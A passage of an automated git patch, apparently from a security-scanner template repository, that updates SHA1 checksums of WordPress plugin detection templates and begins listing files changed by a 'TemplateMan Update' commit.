+http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:afe2f77b9c4b46c0aa931a806ed9840da6c1b33e +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:98365a23ec32288a7cdaaf87dd1356a294d7e087 +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:8eb13bbd6a748173d4c23e37909d834d0cbf5a2d +http/technologies/wordpress/plugins/google-site-kit.yaml:778b90a6e429339ec5e54cf50f327d6ae5bd784b +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:f398a714433ed09d8894a5b46f85810f499dd61b +http/technologies/wordpress/plugins/gtranslate.yaml:a18f0f38e19ba474614f541921ab8eb65f85f49b +http/technologies/wordpress/plugins/gutenberg.yaml:ceee17e0642153194bb5a73b86b8f5a5c4f633b0 +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:8f93111aae8d5644d0ecc1df52e46e4588146630 +http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:2c6eb5a2958fa71c5f9b9f3c9cc3f923957ae653 +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:5128e3b8cf1661f485ad21c7919f0e3b118811c7 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:b72e043c8ac73e657994809ad4f824b2d1e38b90 +http/technologies/wordpress/plugins/header-footer.yaml:0582524d74da4506668592a3a21e747a73fc1078 +http/technologies/wordpress/plugins/health-check.yaml:671ca5cc6adfb1f487c5d5ad4f4bd3521899a0cb +http/technologies/wordpress/plugins/hello-dolly.yaml:b1c31c3a503392b0893412df0bfd67f66a08e994 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:431161cea9f7a563b18dd25f97cb35d8b35c1a9c +http/technologies/wordpress/plugins/imagify.yaml:43558db808bad1013f688374781f0496b0979f47 +http/technologies/wordpress/plugins/imsanity.yaml:eb23f855f666226a39bcd0c5e62bda222d670d43 +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:15e3a0fe4e9d3c8b684ed81d7c38d8f5963cc7d5 +http/technologies/wordpress/plugins/instagram-feed.yaml:1bb251cec19a4850bae825a0ab57a25391c0d4bf +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:8c5eb0b2685635bbcc3c4e86f0101c683f772d3b +http/technologies/wordpress/plugins/iwp-client.yaml:fdaace58d40935a6339104a99da4b9ff24b8f952 +http/technologies/wordpress/plugins/jetpack-boost.yaml:74eb899976e975822bc9083ea905466b752a6e65 +http/technologies/wordpress/plugins/jetpack.yaml:3bf5877fc44fa89f5f53dffd5d892e728223dd2e +http/technologies/wordpress/plugins/kadence-blocks.yaml:49b7614a27b836a156bf9a0c437a61bd15c15f0c +http/technologies/wordpress/plugins/kirki.yaml:ec2d3988189b72a91fda93ec951c89cea6d59ff9 +http/technologies/wordpress/plugins/leadin.yaml:cebb0c9f50604dbe0b5eba4a3562f361a57fffa9 +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:fe1c531f813efce95c8465c0759e9d575ba2f8e9 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:043593ddb5ba2ff26c9510d7a55d3281dbd26787 +http/technologies/wordpress/plugins/litespeed-cache.yaml:6007e19469fab7ddca44c19c461f53db8ad8d764 +http/technologies/wordpress/plugins/loco-translate.yaml:7753ed7a950fe3a2d63c8543c6cf817601e40c93 +http/technologies/wordpress/plugins/loginizer.yaml:b2311b9ed6e775374db2f7572c164dadc9c7230b +http/technologies/wordpress/plugins/loginpress.yaml:9a0ec851b287c8d93465394a34c0e06dcdf58dcc +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:7da9f4925b1be42ce0552ca95bec9111ae393c0d +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:64765191d6483e9d82f92d1051c8f02648c6b0ea +http/technologies/wordpress/plugins/mailpoet.yaml:0b8eb1db41ea1e6c1f3fc72d2b824c596fb1f87d +http/technologies/wordpress/plugins/maintenance.yaml:3705f256a8030b1cfef05f967a22fa510e815abd +http/technologies/wordpress/plugins/mainwp-child.yaml:a2a47023bc2dcf43f32dd680bb6f59b05182696f +http/technologies/wordpress/plugins/malcare-security.yaml:3bd2212a9b0b433f8312b48206cf8d212232e919 +http/technologies/wordpress/plugins/megamenu.yaml:ab4f78f2d5e298081cfbb7a118da4e8d5b585251 +http/technologies/wordpress/plugins/members.yaml:20382c460b37c9547478b41ba0bd18969085043e +http/technologies/wordpress/plugins/meta-box.yaml:a64bddea6cebdaa58c582704dfc6114d87db33d6 +http/technologies/wordpress/plugins/ml-slider.yaml:0b55d89bf2436fbf542a3cbc63a71826e24b7b50 +http/technologies/wordpress/plugins/newsletter.yaml:4939f22ce593ace75fad975661d91a09ddcd71e9 +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:a3e9c29fbf8c1b8361d5058abc29ff87af6af78c +http/technologies/wordpress/plugins/nextgen-gallery.yaml:6d554cf38999c4f2268ef7595a54f1994f58c74f +http/technologies/wordpress/plugins/ninja-forms.yaml:8f67811676ecfb7f1d6bda1b2a347da35bc382f6 +http/technologies/wordpress/plugins/ocean-extra.yaml:d863b883d93ad5144cc03f5053c5731ef8123c11 +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:191b4beb5fdb155022dabcb0e5b3d2dc182039e0 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:ef52c5c58cface8a29dd3ab7c334c054c77d9ed8 +http/technologies/wordpress/plugins/optinmonster.yaml:f37b2eba6f4e268a9460e9739d8d5baad525be70 +http/technologies/wordpress/plugins/otter-blocks.yaml:c907909dff50fd5a204cc3b85224965c2a3758b7 +http/technologies/wordpress/plugins/password-protected.yaml:80067d56544816232306fefe26d8a3c1b031d7d1 +http/technologies/wordpress/plugins/pdf-embedder.yaml:36c7b3808215b738e6485e61e2d86d2f56784d12 http/technologies/wordpress/plugins/photo-gallery.yaml:a2d49608d9cfa92c7ff2fec2e8d158bbfd1f72dd http/technologies/wordpress/plugins/php-compatibility-checker.yaml:528a6a29383907a8488737d2302a6a1a2d929553 -http/technologies/wordpress/plugins/pixelyoursite.yaml:b3da054b040050de221d3f85ad1e51d4f109472c -http/technologies/wordpress/plugins/polylang.yaml:fe96dc52452a9589f615f5c50a2a2d566408d24d -http/technologies/wordpress/plugins/popup-builder.yaml:b4c33fcfffe3b96d16f7e7c55a76a57223cfd988 -http/technologies/wordpress/plugins/popup-maker.yaml:e01af93b67f33cd260b458408dc505a8209b629e -http/technologies/wordpress/plugins/post-smtp.yaml:5b34a59d80a1257b18e38bf29177aa83b238f6b2 -http/technologies/wordpress/plugins/post-types-order.yaml:8db67ac7ec324b3d4800afe95f2c5b479fe0af82 -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:ac0ee352c996bbeefc1d359b6147caf570f918f4 -http/technologies/wordpress/plugins/pretty-link.yaml:62549cdff64a91d536835fa1fea43109f0561156 -http/technologies/wordpress/plugins/really-simple-captcha.yaml:435b8299f4b4b830f584ef2738d5ec570d709eb4 -http/technologies/wordpress/plugins/really-simple-ssl.yaml:8c3f228a961065c0ffc6ae288e522af0267ad147 -http/technologies/wordpress/plugins/redirection.yaml:d23e77de89ba863def13db88a8b6344d31b0ba19 -http/technologies/wordpress/plugins/redux-framework.yaml:45d721b643a269e7a6837b9a5d1d5fb22e29853b -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:0d6a705e8fcae72c35d8d4b3ed8aa7f79980e8d8 -http/technologies/wordpress/plugins/safe-svg.yaml:a6a21aaef82c40ca2bcb59ce2e61718dd0e6af55 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3e08b5bdb1f3ec58dd08c620b7a9acc728913efd -http/technologies/wordpress/plugins/sg-cachepress.yaml:130f5809e4cf765690b79bcfda7bd132336e4b08 -http/technologies/wordpress/plugins/sg-security.yaml:6bbec86489b5c2eaf257315880bfc0c4fd4d464f -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:2529031f99ea27c92a54d847c15d77480847fdd7 -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:d0ef637d9661f51b92339cabe9e3241c8ea9d6c6 -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:e8069c056b1dcc1dfbbc6ff7a561b9e4c76bc28a +http/technologies/wordpress/plugins/pixelyoursite.yaml:f96bdcba1c915994880c8612dc3b10feed1d8d3f +http/technologies/wordpress/plugins/polylang.yaml:38390b89bea14384c59ee3d787c3d2a5ef396e83 +http/technologies/wordpress/plugins/popup-builder.yaml:76dbd191f39696f62ac0be9b7e0a7619c300fc9a +http/technologies/wordpress/plugins/popup-maker.yaml:9898f98e8817a0a6eca29a652c9aa671ef897aaa +http/technologies/wordpress/plugins/post-smtp.yaml:fb3913d039e39bdfa909850be96a436c2daed0da +http/technologies/wordpress/plugins/post-types-order.yaml:c140e8206ede576928c853247b1139a9e1306bf2 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:4c1a2a5ced317ec9fe1105d2171ce6d3b35c2bd4 +http/technologies/wordpress/plugins/pretty-link.yaml:f52eb94a236e0e95b8db45877a65ace2dd7d2b39 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:4c8c8b459ea6a2452d1dddd9910b668e42fe3ab4 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:c8f30313d72e2d2a6315fc30a8331f2eb9aa41ad +http/technologies/wordpress/plugins/redirection.yaml:78dbf29316c6ac3aa23678bd4aed69a5ddd42175 +http/technologies/wordpress/plugins/redux-framework.yaml:0f9712d7e86d87aff431070568cf1ea7cb5198e5 +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:8a4d0748905dc0457e96269db56428c7b2479864 +http/technologies/wordpress/plugins/safe-svg.yaml:2103b4bcb3c3e97d3a601618d4adf277da860845 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3abc289406b03c9a1a9a9c3a61f01adca40f3490 +http/technologies/wordpress/plugins/sg-cachepress.yaml:3b166aca8dab47fdce5d13abd98c504b0abfbfcf +http/technologies/wordpress/plugins/sg-security.yaml:1d900366a34bc7240fd070b931b8a69db1fe6291 +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:22cf98912edc91bf3425771d400c10f6e39a0e92 +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:a15a92c4687e1f7bc6aab1849561ebc8a6522a7d +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:86f6b3755978c76efc238361006fba469776da59 http/technologies/wordpress/plugins/simple-page-ordering.yaml:5ca11a9af02a43514837bfae1a4b1e0271674751 -http/technologies/wordpress/plugins/siteguard.yaml:e4a47780641caa5fc7b28702a8619544f10ad1d2 -http/technologies/wordpress/plugins/siteorigin-panels.yaml:581d45daed9aa4def46869c8dc9770508824abfd -http/technologies/wordpress/plugins/smart-slider-3.yaml:cd1b9cefc186446cdd9209cdd5c456dbcbb42730 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:f7e37fa2f502dd7c949c0bf8b43dec56315cc35c +http/technologies/wordpress/plugins/siteguard.yaml:04beb993d2d664061085bd60104bcf086ee5f492 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:a8b2262d950dd95e64f0f4d048fc4a6988853d81 +http/technologies/wordpress/plugins/smart-slider-3.yaml:bde8a44b6a8bfe6ce5208bbfc5fef9116b65c350 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:243974a21f98da84c266affec329cc4d1f9596da http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:c9da76f5a8dab4cb65e35e49aebd0300fe20c1a8 -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:d3b0d6984b6149fc9c376c67f4427c286a42c4d1 -http/technologies/wordpress/plugins/sucuri-scanner.yaml:de8bfb0cfbd640fc53b8eeeda80fbdf787b66b69 -http/technologies/wordpress/plugins/svg-support.yaml:352c1dd32804e85f4df4b22834ca0e797a2aad60 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:eb076e2a3b271ec1744b1b244cedc859b97b2dcc -http/technologies/wordpress/plugins/tablepress.yaml:c3594421fecfa1311ccd792b99201de358316284 -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:686b9870e43a0eb740d247fb83a567700577df9b -http/technologies/wordpress/plugins/the-events-calendar.yaml:d1c59cba049e515abed8ca65950cd156cb84c928 -http/technologies/wordpress/plugins/themeisle-companion.yaml:680ce8f2109280e4684d527b0cda47fd480711a4 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:89c4aa06eb4911cfa3b826a3d8203bf605610f1a -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:7e6c3b01800f88b4ff69e32cadfb3281e73b9390 -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:6ddb9cd781f24984eb82258381b8fafd1dee8a2a -http/technologies/wordpress/plugins/under-construction-page.yaml:d4c9887eca48da58b42bdcad120c493e4b916e35 +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:404d69b6a6b8e3f3e450b281f6e7f03f409a0f3f +http/technologies/wordpress/plugins/sucuri-scanner.yaml:fee0a5d0516d042c28c9468ef8fb5d5e38ce26c6 +http/technologies/wordpress/plugins/svg-support.yaml:1937f2cbd2738469bf2bd738d98dde3f67e03fb1 +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:63994d3a1e4a5b0122388621d2ef614a2eb37faa +http/technologies/wordpress/plugins/tablepress.yaml:b9d728ac847c6d44006d896e5cd3df57e4004f08 +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:b3cd6a705aa73c6a09557b7cebc1d14097e4b1f2 +http/technologies/wordpress/plugins/the-events-calendar.yaml:60035e7a44045476cba892f90e28f535168ca338 +http/technologies/wordpress/plugins/themeisle-companion.yaml:308725e3df3f6646f7b024131e4787deca30e357 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:41f70c014363a9631cc63ff331f6fa4a55f7c903 +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:54ca06f59600b8ff150a29ce4db9df67be689237 +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:007bc1a439e5ad52d345d0b21f6f92bbf8e48aa4 +http/technologies/wordpress/plugins/under-construction-page.yaml:006b99ffb995bb30292666cd1d26a6433d95d495 http/technologies/wordpress/plugins/unyson.yaml:51e3ce4490086550b60f59a3f2f7e401001db1ea -http/technologies/wordpress/plugins/updraftplus.yaml:0076f3c9a5ed4f2e2d2749c1b65eb23140214d7a -http/technologies/wordpress/plugins/use-any-font.yaml:382b7daeb7b74956c8e3ee5f4c65254c65c4e487 -http/technologies/wordpress/plugins/user-role-editor.yaml:7c91ccbbd4225e3f1ad358f2a6feeb311b3f81fb -http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:d3a9e8b173ba11ca7733ed58895d793b2824ba5e -http/technologies/wordpress/plugins/w3-total-cache.yaml:d19a3d9cd406a2763a5d1e15391d260258f10d97 -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:d438f3628f635772866af020c74bad5dfe1d0404 -http/technologies/wordpress/plugins/webp-express.yaml:28c13e642196daae49de19d38ef3e5890e9cccf8 -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:a698c5c96df88e883aab70f73fe5b489a8470adc -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6ce9a25f844c90dc4a8a0ed085692d03e0e643ae -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:0c20bcedf17334904bd329de1f9596cfecca9ae6 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:f4bbcbe628b62a5853af61a175bec617bb48fbe4 -http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:94e0db445fc82d755e55292d448d99a450ae723c -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:a0bd411538fbdd622c592fbf6c705753f3b1ca18 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:9ed780c632c83cd2d948af2a01eee2ea9cdd87a5 -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:fc7c14abefdde2e6a9b280a04e504c623f2168bf -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d498033186c927e965619ba1736f8dc88c2c88b1 -http/technologies/wordpress/plugins/woocommerce-services.yaml:053a38cfa9a063b0475a7ec28d1f00c85589ffb6 -http/technologies/wordpress/plugins/woocommerce.yaml:21e14ecdd9795d0b3377c8cdb370ef2408a902c4 +http/technologies/wordpress/plugins/updraftplus.yaml:67b8ef043332480e6cc21270e92a83846dfef37f +http/technologies/wordpress/plugins/use-any-font.yaml:4839586b85559db12191032b7fe4154b683a25bd +http/technologies/wordpress/plugins/user-role-editor.yaml:ba1c35cfae35cd0ad01726b3b5862f7ca8094db8 +http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:27cbc019dd6d9540482e167bb4a9f0c95bfbd233 +http/technologies/wordpress/plugins/w3-total-cache.yaml:ad66a00a01da5e7b8cff52912b27f6bad0f3839c +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:2c96756602c58b2d03c3a251b485f0fc290d4521 +http/technologies/wordpress/plugins/webp-express.yaml:3fdaee8be60980e572316df08fdc1bae378f1c6a +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:0bf8d28a1008e3b9fd4e318adabd44506ddf3472 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:871c7b41aebc284ba9d5bc1607270888fb05b634 +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:f8a89bab5553200004cd4ed2ff74f2f0ed6d3839 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:15b3a184c874db99255ba2551d4d925b71fba265 +http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:8e91bc3725d0de356884685dddd7736c9a637e67 +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:d3230d977d47969a5dabaa59f5207bd47a4eba82 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:3c8f70f3717ebb144aeecc4cf78351928e724ee4 +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:e8e143f83f92d8128f4dcc8cfae0d24e744ff11b +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:8f2e7130b683e6c7db2d572d169d8b0d2959b8ee +http/technologies/wordpress/plugins/woocommerce-services.yaml:9f4168ea86b7c265e840ecc39c5cd91457b69bba +http/technologies/wordpress/plugins/woocommerce.yaml:ab02a75370fec98f312be65543b5571bb0495e40 http/technologies/wordpress/plugins/woosidebars.yaml:49e90e83fc3185fed5f2c0392a13a991ab64601d -http/technologies/wordpress/plugins/wordfence.yaml:59cf258e463fa7f76b21f3b3088b1d91a8ac44ee -http/technologies/wordpress/plugins/wordpress-importer.yaml:3a47895288fe9d8d9ada42228022e25510544e8c -http/technologies/wordpress/plugins/wordpress-seo.yaml:86e00ac8b21548056c7a9efbba9b66c675928457 -http/technologies/wordpress/plugins/worker.yaml:909166af340135b049385064e0cac70e3168c34f -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:8bcbdb8253bd78b63c34db17f1c754c5ebd2bd9f -http/technologies/wordpress/plugins/wp-file-manager.yaml:cb51b1eaed5e009fa74ccad652e4590ff3613fd0 -http/technologies/wordpress/plugins/wp-google-maps.yaml:fa3a0d2461909eb76f9f4176a82719abe2a8baee -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:65d7a5942c9f22136fdf1568a47532465a0fd8e8 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:ba76df7ace8e17dbd081adb0beafa3d2e9a2751c -http/technologies/wordpress/plugins/wp-migrate-db.yaml:eb5434734e59d7dac0579b08905ee11bc5ad623e -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:0b8258608436387a5af44bb17dc664261d84dc20 -http/technologies/wordpress/plugins/wp-optimize.yaml:b4c12386fa882d15ce98bc19736fe42f397ff7ce -http/technologies/wordpress/plugins/wp-pagenavi.yaml:1ee64be881e3ce5eff6e61a1bf7b3878a4aa80c3 -http/technologies/wordpress/plugins/wp-reset.yaml:4aeb62db4c520ed2a1128a3931f1da1627d5504b -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:69b5e88af7e6e7b825f22b6f6eb34dea213dab95 -http/technologies/wordpress/plugins/wp-rollback.yaml:7a2b71c8a6a0c35005dad0fd021f4daa29209549 +http/technologies/wordpress/plugins/wordfence.yaml:0462473344c345d9c4eb312705ebfcc5505cdcf5 +http/technologies/wordpress/plugins/wordpress-importer.yaml:205349dfc8dd684e8ab78d952a214f75af080074 +http/technologies/wordpress/plugins/wordpress-seo.yaml:0a74d6507bf2d8dbb696036a525130a48bdb1a68 +http/technologies/wordpress/plugins/worker.yaml:8e8fc14abfc1380551a94ee7f122b912bcacb4bd +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:ad1d73e97bbcc497867ff8d72002f8aebcf52ae2 +http/technologies/wordpress/plugins/wp-file-manager.yaml:ca4c546d57e540d639a66acd375eeb7d0b90fe5a +http/technologies/wordpress/plugins/wp-google-maps.yaml:c2c7c8477a9742575d40bdc508937798d5c9f6a3 +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:6091e5b4597b0556c2705a55b964b1b0f8c1f369 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:15d672886d871a30b62b87539ab11136bba70bb0 +http/technologies/wordpress/plugins/wp-migrate-db.yaml:44a5b5c4175d7c71e76216915ef4d2b1275881b1 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:65e0cf9f44588209a789e704fd5d4070f6482962 +http/technologies/wordpress/plugins/wp-optimize.yaml:31c2935841bd67eeeb87524152bb389c823d9ded +http/technologies/wordpress/plugins/wp-pagenavi.yaml:96b012cb4c09e81ee2bf7e679cf96b2dbb1066f8 +http/technologies/wordpress/plugins/wp-reset.yaml:412514499164783863b8b68430c7f197f8b6ae54 +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:ba98eba18acb3e8959037689a48560a9ce31a9f1 +http/technologies/wordpress/plugins/wp-rollback.yaml:4e307fe6f0d30b930431b040e0f478add975ad92 http/technologies/wordpress/plugins/wp-seopress.yaml:93a821f479301582f2209a9f463b408118cfbec9 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:583c9968cc733e34f6b8b5b61a953c2d4b95e27b -http/technologies/wordpress/plugins/wp-smushit.yaml:aa13f78eb92d74a227a5cc3b4850c50f9e6d1825 -http/technologies/wordpress/plugins/wp-statistics.yaml:3a7c780acc3cd312da690aa73dae8ccd151a9a90 -http/technologies/wordpress/plugins/wp-super-cache.yaml:cdb330ec2ee847335d17369905afe5b1ebb9b624 -http/technologies/wordpress/plugins/wp-user-avatar.yaml:401a4a8d3ad83bd1c23fd1be67314742cbf72468 -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:5194cfad7904c267af9451baf7460c96d5310e02 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:66ae3a35ed37853fe298506a45469b3300e9f671 -http/technologies/wordpress/plugins/wpforms-lite.yaml:cb9b2f5385e57ef8acd020fc2acb090d2a5d7d40 -http/technologies/wordpress/plugins/wps-hide-login.yaml:791f9ccdb7e2de037094e6c41cebf6d93f50cf90 -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:1760dbfa341c1f3dc21ad5d33393b55216735c39 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:44243c1cc0d8c94a0ca19b5baf1f6f6fb70900a5 +http/technologies/wordpress/plugins/wp-smushit.yaml:dfffaa485180a52888024c527a89ad9c74307aad +http/technologies/wordpress/plugins/wp-statistics.yaml:3c959f67560b1721401a000bded1bc2959c303d1 +http/technologies/wordpress/plugins/wp-super-cache.yaml:0b19548fad990c640012c855076270e0491c2a6f +http/technologies/wordpress/plugins/wp-user-avatar.yaml:1086201347cbaa54c492a64cfda00759e950437b +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:9f2183e36b5e1b85cd6849073307e5cad8d5b52d +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:ba93d4ef4608a790cd9d3d847b68bf9b1e1dea50 +http/technologies/wordpress/plugins/wpforms-lite.yaml:936181dc67fd85927eb912b1022a8a7c24b4a848 +http/technologies/wordpress/plugins/wps-hide-login.yaml:54566fd541d82b11fb105253384e00a14bc1cc75 +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c89d7b1d8eff0f72ba3d4ad3b54683d9b08a81bb http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:061c0ff47f223158098b68a346e0c536112e8259 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:83ae1cae0ae4886afdebf8213bfea549ca025f8a +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e3e323f44082c7c6610d1016c0062d40a6f6d788 http/technologies/wordpress-detect.yaml:764a9e3823e31a5c778e6abb4d6065347a2005e9 http/technologies/workerman-websocket-detect.yaml:fca8ff5fffe7de46782ab042287eddee06e883ed http/technologies/wso2-products-detect.yaml:9156bb5d6fccb55637e4fd2e59f0decc99c3fa69 @@ -7032,7 +7032,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e -templates-checksum.txt:9e5fcb0888ac506996f56dea550bba9ca15dc63d +templates-checksum.txt:fd94b06a3a2adfa55972bfc3a33b2b8231bf430f wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 7ebf9e6a0d75055755cb51cca09b97becf4b7665 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 1 Sep 2023 08:59:06 +0000 Subject: [PATCH 0064/1090] TemplateMan Update [Fri Sep 1 08:59:06 UTC 2023] :robot: --- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 + http/technologies/wordpress/plugins/add-to-any.yaml | 1 + http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 + http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 + http/technologies/wordpress/plugins/akismet.yaml | 1 + .../wordpress/plugins/all-404-redirect-to-homepage.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 + .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 + http/technologies/wordpress/plugins/amp.yaml | 1 + http/technologies/wordpress/plugins/antispam-bee.yaml | 1 + http/technologies/wordpress/plugins/astra-sites.yaml | 1 + http/technologies/wordpress/plugins/astra-widgets.yaml | 1 + http/technologies/wordpress/plugins/autoptimize.yaml | 1 + http/technologies/wordpress/plugins/backwpup.yaml | 1 + http/technologies/wordpress/plugins/better-search-replace.yaml | 1 + http/technologies/wordpress/plugins/better-wp-security.yaml | 1 + .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 + http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 + http/technologies/wordpress/plugins/breeze.yaml | 1 + http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 + .../technologies/wordpress/plugins/child-theme-configurator.yaml | 1 + http/technologies/wordpress/plugins/classic-editor.yaml | 1 + http/technologies/wordpress/plugins/classic-widgets.yaml | 1 + .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 + http/technologies/wordpress/plugins/cmb2.yaml | 1 + http/technologies/wordpress/plugins/coblocks.yaml | 1 + http/technologies/wordpress/plugins/code-snippets.yaml | 1 + http/technologies/wordpress/plugins/coming-soon.yaml | 1 + http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7.yaml | 1 + http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 + http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 + http/technologies/wordpress/plugins/cookie-notice.yaml | 1 + http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 + .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 + http/technologies/wordpress/plugins/custom-css-js.yaml | 1 + http/technologies/wordpress/plugins/custom-fonts.yaml | 1 + http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 + http/technologies/wordpress/plugins/disable-comments.yaml | 1 + http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/duplicate-page.yaml | 1 + http/technologies/wordpress/plugins/duplicate-post.yaml | 1 + http/technologies/wordpress/plugins/duplicator.yaml | 1 + .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 + http/technologies/wordpress/plugins/easy-fancybox.yaml | 1 + http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 + http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 + http/technologies/wordpress/plugins/elementor.yaml | 1 + http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 + http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 + http/technologies/wordpress/plugins/envato-elements.yaml | 1 + .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 + http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 + .../technologies/wordpress/plugins/facebook-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 + .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 + http/technologies/wordpress/plugins/flamingo.yaml | 1 + http/technologies/wordpress/plugins/fluentform.yaml | 1 + 